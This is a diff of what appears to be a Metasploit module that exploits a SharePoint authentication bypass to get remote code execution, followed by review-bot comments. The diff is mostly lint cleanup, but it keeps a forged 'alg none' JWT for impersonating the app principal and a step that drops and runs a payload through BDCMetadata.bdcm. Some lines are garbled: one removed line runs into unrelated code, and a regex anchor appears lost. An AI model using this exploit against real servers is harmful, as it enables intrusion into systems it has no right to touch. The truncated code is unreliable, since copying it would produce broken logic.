diff --git a/modules/exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce.rb b/modules/exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce.rb
index 117c38beb822..97aff34c2d80 100644
--- a/modules/exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce.rb
@@ -78,6 +78,7 @@ def initialize(info = {})
 OptString.new('TARGETURI', [ true, 'The URL of the SharePoint application', '/' ])
 ])
 end
+
 def resolve_target_hostname
 res = send_request_cgi({
 'uri' => normalize_uri(target_uri.path, '_api', 'web'),
@@ -128,19 +129,16 @@ def gen_endpoint_hash(url)
 end
 
 def gen_app_proof_token
-
- jwt_token1 = "{\"iss\":\"00000003-0000-0ff1-ce00-000000000000\",\"aud\":\"00000003-0000-0ff1-ce00-000000000000@#{@realm}\",\"nbf\":\"1673410334\",\"exp\":\"1725093890\",\"nameid\":\"00000003-0000-0ff1-ce00-000000000000@#{@realm}\", \"ver\":\"hashedprooftoken\",\"endpointurl\": \"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\": 1, \"isloopback\": \"true\"}"
-
 jwt_token2 = {
- :iss => "00000003-0000-0ff1-ce00-000000000000",
- :aud => "00000003-0000-0ff1-ce00-000000000000@#{@realm}",
- :nbf => "1673410334",
- :exp => "1725093890",
- :nameid => "00000003-0000-0ff1-ce00-000000000000@#{@realm}",
- :ver => "hashedprooftoken",
- :endpointurl => "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=",
- :endpointurlLength => 1,
- :isloopback => "true",
+ iss: '00000003-0000-0ff1-ce00-000000000000',
+ aud: "00000003-0000-0ff1-ce00-000000000000@#{@realm}",
+ nbf: '1673410334',
+ exp: '1725093890',
+ nameid: "00000003-0000-0ff1-ce00-000000000000@#{@realm}",
+ ver: 'hashedprooftoken',
+ endpointurl: 'qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=',
+ endpointurlLength: 1,
+ isloopback: 'true'
 }.to_json # Spacing doesn't matter in JSON yet using jwt_token2 causes a failure unless these spaces are added
 
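Review bot: The trailing comment on the `}.to_json` context line now annotates code it no longer describes: it explains spaces that had to be inserted into the hand-built `jwt_token1` string, which this hunk deletes, and `Hash#to_json` emits no such spaces, so the next reader will look for a whitespace dependency that does not exist. Either drop it or reword it to what still holds, e.g. `# Unsigned JWT body; the alg "none" header and a dummy signature are appended below`. Separately, `exp: '1725093890'` is a fixed Unix timestamp (late August 2024); whether the target enforces `exp` on a `hashedprooftoken` I cannot confirm from this hunk, but if it does the module silently stops working after that date, and `exp: (Time.now.to_i + 3600).to_s` would avoid that. gen_app_proof_token's body continues past the end of the hunk.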
@@ -151,7 +149,6 @@ def gen_app_proof_token
 
 b64_token = Rex::Text.encode_base64(jwt_token2)
 "eyJhbGciOiAibm9uZSJ9.#{b64_token}.YWFh"
-
 end
 
 def send_get_request(url)
@@ -177,6 +174,7 @@ def get_current_user
 if res&.code != 200
 raise SharepointInvalidResponseError, 'Failed to get current user'
 end
+
 res.body
 end
 
@@ -202,7 +200,7 @@ def do_auth_bypass
 user_info = get_current_user
 raise SharepointInvalidResponseError, 'Unable to identify the current user' if user_info.nil?
 
- user_info =~ %r{.+?\|(.+)\|.+?<\/d:LoginName>}
+ user_info =~ %r{.+?\|(.+)\|.+?}
 
 raise SharepointInvalidResponseError, 'Unable to identify the LoginName of the current user' unless Regexp.last_match(1)
 username = Regexp.last_match(1)
@@ -245,7 +243,6 @@ class #{class_name}: System.Web.Services.Protocols.HttpWebClientProtocol{
 end
 
 def drop_and_execute_payload
- bdcm_data = " '/BusinessDataMetadataCatalog/' }
 res_json = send_json_request('/_api/web/folders', body)
@@ -366,7 +363,7 @@ def on_new_session(_session)
 end
 
 def store_bdcmetadata_loot(data)
- file = store_loot('sharepoint.config', 'text/plain', rhost , data, 'BDCMetadata.bdcm', 'The original BDCMetadata.bdcm file before writing the payload to it')
+ file = store_loot('sharepoint.config', 'text/plain', rhost, data, 'BDCMetadata.bdcm', 'The original BDCMetadata.bdcm file before writing the payload to it')
 print_good("Stored the original BDCMetadata.bdcm file in loot before overwriting it with the payload: #{file}")
 end
 
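Review bot: The added regex in the `@@ -202,7 +200,7 @@` hunk is shown without the `</d:LoginName>` anchor that the removed line had, i.e. `user_info =~ %r{.+?\|(.+)\|.+?}`. If that anchor was genuinely dropped rather than swallowed by the page rendering of a tag-like string, the greedy `(.+)` is free to run to the last `|` anywhere in the response body (the trailing `\|.+?` only needs one character after it), so the captured value that becomes the username for the bypass can be wrong as soon as the body holds more than one pipe-delimited field. The lint cleanup that this commit appears to be after keeps the anchor and only drops the escape, which is redundant inside `%r{}`: `user_info =~ %r{.+?\|(.+)\|.+?</d:LoginName>}`. do_auth_bypass starts and ends outside this hunk.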